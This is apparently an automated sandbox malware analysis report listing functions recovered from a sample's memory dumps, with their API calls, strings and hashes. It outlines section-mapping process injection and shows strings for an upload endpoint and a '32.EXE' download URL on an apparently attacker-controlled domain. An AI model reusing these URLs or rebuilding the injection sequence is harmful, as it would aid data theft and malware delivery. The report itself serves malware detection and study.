                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2012307162-0
                                                                                                            • Opcode ID: a6cfbb7d2b7d01947da6ee4177dbd4359abb03d10f63357c3ae58a50b924d1c4
                                                                                                            • Instruction ID: 8938db434e96612534016a02d1462975ea11bc235ffb2510977683e4520b8e1c
                                                                                                            • Opcode Fuzzy Hash: a6cfbb7d2b7d01947da6ee4177dbd4359abb03d10f63357c3ae58a50b924d1c4
                                                                                                            • Instruction Fuzzy Hash: 75112EB9D10208FFCB09DFA8E949B9EBBB4FB4C300F008564E505A7280D7749A84CB50
                                                                                                            Function 00301A1A Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 077fc3c8398f8f087e23a502380f2a09b84c55421de6a79508d8288ef49f2725
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 077fc3c8398f8f087e23a502380f2a09b84c55421de6a79508d8288ef49f2725
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            Function 00301A99 Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 4a8e169d1d95e7c82201e4b2ba72dfe82eb582d98cd4d4725a643b29d450bf52
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 4a8e169d1d95e7c82201e4b2ba72dfe82eb582d98cd4d4725a643b29d450bf52
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            Function 00301B3A Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 80584b6ed585a42efaf92f9b5a58592e085068adf72dc0ff78f0d7bfa9e55f4c
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 80584b6ed585a42efaf92f9b5a58592e085068adf72dc0ff78f0d7bfa9e55f4c
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            Function 00301B18 Relevance: 4.5, APIs: 3, Instructions: 16synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 2a70fb1f4047b439d5c3878af28c10e08edde4111a6fbb84570760f772c1aa1e
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 2a70fb1f4047b439d5c3878af28c10e08edde4111a6fbb84570760f772c1aa1e
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            Function 00306090 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _strlen.LIBCMT ref: 003060F7
                                                                                                            • X64Call.DOWNLOADED_FILE(221F1B10,00007FFE,00000004,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00306145
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092177880-0
                                                                                                            • Opcode ID: 366b4b49d87fa7547b839f7c916e7171862137e096c5fbc5f65d3ce70c56e964
                                                                                                            • Instruction ID: ffcf53c0972990021551d03c5f0de1edaa2c8c7e5e1072dd56579e896fe8f023
                                                                                                            • Opcode Fuzzy Hash: 366b4b49d87fa7547b839f7c916e7171862137e096c5fbc5f65d3ce70c56e964
                                                                                                            • Instruction Fuzzy Hash: 462130B0914208DFDB25CFA8EC527AFB7B9FF48300F00512DE90897290E7705694CB95
                                                                                                            Function 003058D5 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1531140918-0
                                                                                                            • Opcode ID: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                                                            • Instruction ID: 383a808b53811942b902f61da487c9cdb8566c0808be25f0fcd55df57bb4a3af
                                                                                                            • Opcode Fuzzy Hash: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                                                            • Instruction Fuzzy Hash: ECF0F931A18D1DAFCF56ABACD925DAEBBB1FB68320F110615E405E3084DB31E9509F91

                                                                                                            Non-executed Functions

                                                                                                            Function 003144B0 Relevance: 145.8, APIs: 62, Strings: 21, Instructions: 500nativestringlibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000044,00000000), ref: 0031450D
                                                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 00314525
                                                                                                            • GetProcAddress.KERNEL32(?,NtCreateSection), ref: 00314537
                                                                                                            • GetProcAddress.KERNEL32(?,NtMapViewOfSection), ref: 0031454C
                                                                                                            • GetProcAddress.KERNEL32(?,RtlCreateUserThread), ref: 00314561
                                                                                                            • GetProcAddress.KERNEL32(?,NtUnmapViewOfSection), ref: 00314573
                                                                                                            • GetProcAddress.KERNEL32(?,NtClose), ref: 00314585
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00314591
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,0000091C,00000004,08000000,00000000), ref: 0031463B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 00314682
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314690
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 003146D8
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 0031473B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00314784
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314792
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003147DA
                                                                                                            • _memmove.LIBCMT ref: 00314806
                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0031481F
                                                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00314837
                                                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00314851
                                                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 0031486F
                                                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 00314886
                                                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 0031489E
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 003148B6
                                                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 003148CD
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 003148E5
                                                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 003148FD
                                                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 00314914
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 0031492C
                                                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 00314944
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 0031495B
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00314997
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 003149DD
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 003149EB
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00314A33
                                                                                                            • _memmove.LIBCMT ref: 00314A5B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,003055B9), ref: 00314A98
                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00314AE0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00314B1F
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B46
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B57
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B68
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B79
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B8A
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B9B
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BA8
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BB5
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BC2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BCF
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00314BE7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BF1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BFB
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C1D
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C2E
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C3B
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C4C
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C59
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C6A
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C77
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00314C89
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C93
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C9D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate_memmove$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                                                            • String ID: CloseHandle$D$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                                                            • API String ID: 4191060109-4063295011
                                                                                                            • Opcode ID: 46932f945e7be0b7c02c4322d2cec7bc5fe6b61baed2ee4b8facf4b752a7a1e3
                                                                                                            • Instruction ID: ae6134267d67571173c451c309296a3c89f41e8980cad314f33764e250f24ddb
                                                                                                            • Opcode Fuzzy Hash: 46932f945e7be0b7c02c4322d2cec7bc5fe6b61baed2ee4b8facf4b752a7a1e3
                                                                                                            • Instruction Fuzzy Hash: F5222FB5A40218EFEB35CFA4DD89F9EB779FB48701F108598E609A7290C7746984CF60
                                                                                                            Function 00321030 Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 351synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenEventW.KERNEL32(00100000,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 00321042
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{7E105FD4-6112-4FB9-A722-91E984087449}), ref: 00321071
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003210EA
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00321149
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Strings
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00321065
                                                                                                            • {EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}, xrefs: 003210A1
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00321036
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                                                            • String ID: {7E105FD4-6112-4FB9-A722-91E984087449}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}
                                                                                                            • API String ID: 385723476-1649484402
                                                                                                            • Opcode ID: d6d611e93e2de728b210dc9f1af347de2a067566eff1419c97f4563720f7bc47
                                                                                                            • Instruction ID: b72b12ac772d41c5a3abb0814b413ac18d29ec64ae7e4194df70a029a4c0c92c
                                                                                                            • Opcode Fuzzy Hash: d6d611e93e2de728b210dc9f1af347de2a067566eff1419c97f4563720f7bc47
                                                                                                            • Instruction Fuzzy Hash: 53E15174900314EFDB2ADFA5EE8DBAE7779BB18701F208519E206A61E0C7B859C4CF51
                                                                                                            Function 00305140 Relevance: 75.6, APIs: 33, Strings: 10, Instructions: 352stringmemoryencryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000B3C), ref: 00305150
                                                                                                            • lstrcpyW.KERNEL32(00000000,{E29CBB21-643E-472E-B199-71CB48A8D055}), ref: 00305179
                                                                                                            • lstrcpyW.KERNEL32(-0000009C,{7E105FD4-6112-4FB9-A722-91E984087449}), ref: 00305191
                                                                                                            • lstrcpyW.KERNEL32(-000000EA,{2CE5F8BD-0511-45BE-87AB-414E34221A74}), ref: 003051A9
                                                                                                            • lstrcpyW.KERNEL32(-00000138,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0), ref: 003051BF
                                                                                                            • lstrcpyW.KERNEL32(-000005EA,00376BDC), ref: 003051D7
                                                                                                            • lstrcpyW.KERNEL32(-000006B2,https://woo097878781.win/upload.php), ref: 003051EF
                                                                                                            • lstrcpyW.KERNEL32(-0000090A,{DD790A50-FBBA-44EC-A8E0-C3475C4234CA}), ref: 00305205
                                                                                                            • _memset.LIBCMT ref: 00305302
                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000010,4000000C,00000000,00000000), ref: 00305328
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Strings
                                                                                                            • {DD790A50-FBBA-44EC-A8E0-C3475C4234CA}, xrefs: 003051F5
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 0030517F
                                                                                                            • HWID_%s, xrefs: 00305388
                                                                                                            • {2CE5F8BD-0511-45BE-87AB-414E34221A74}, xrefs: 00305197, 0030558D
                                                                                                            • https://woo097878781.win/upload.php, xrefs: 003051DD
                                                                                                            • %s %s, xrefs: 00305574
                                                                                                            • https://woo097878781.win/32.EXE, xrefs: 0030543B
                                                                                                            • {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}, xrefs: 00305568
                                                                                                            • {E29CBB21-643E-472E-B199-71CB48A8D055}, xrefs: 0030516E
                                                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 003051AF, 0030542A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
